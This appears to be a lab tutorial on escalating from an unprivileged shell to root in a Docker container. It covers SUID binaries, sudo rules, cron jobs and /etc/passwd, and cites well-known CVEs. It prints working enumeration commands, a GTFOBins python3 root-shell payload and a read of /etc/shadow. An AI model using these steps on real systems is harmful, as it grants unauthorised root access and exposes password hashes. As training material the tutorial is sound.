Escalate from an unprivileged shell to root inside a Docker container using four real techniques:
SUID binary abuse — find setuid executables and use GTFOBins payloads to get a root shell
Sudo misconfiguration — exploit NOPASSWD sudo rules that allow running commands as root
Writable cron jobs — overwrite a script executed by root's cron with a reverse shell
World-writable /etc/passwd — add a new root user by writing directly to the password file
Background
Privilege escalation (privesc) is the step after initial access — turning a low-privileged foothold into root. Every real engagement involves it. The Linux privesc playbook is well-documented because the same misconfigurations appear in production environments year after year.
Real-world examples:
CVE-2021-4034 (PwnKit) — polkit pkexec SUID binary mishandles argv; any local user → root. Affects all major Linux distros; 12 years undetected. Thousands of cloud VMs compromised within 24h of PoC release.
CVE-2019-14287 — sudo versions < 1.8.28: sudo -u#-1 runs as root even when user is explicitly excluded. A (ALL, !root) sudoers rule fails to block it.
2021 TeamCity privesc chain — writable cron script in /etc/cron.d/ executed by root; attacker overwrites it post-SQLi compromise to get root shell.
Dirty COW (CVE-2016-5195) — race condition in kernel copy-on-write; unprivileged user writes to root-owned SUID binaries. Exploited in wild against hosting providers.
# Who am I?
id && whoami
# What can I sudo?
sudo -l
# Find SUID binaries
find / -perm -u=s -type f 2>/dev/null | grep -v proc
uid=1001(lowuser) gid=1001(lowuser) groups=1001(lowuser)
User lowuser may run the following commands on ...:
(root) NOPASSWD: /usr/bin/find
/usr/bin/python3.10 ← SUID set
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/newgrp
# GTFOBins payload for SUID python3
/usr/bin/python3 -c 'import os; os.execl("/bin/bash", "bash", "-p")'
# Verify root
id
whoami
cat /etc/shadow | head -3
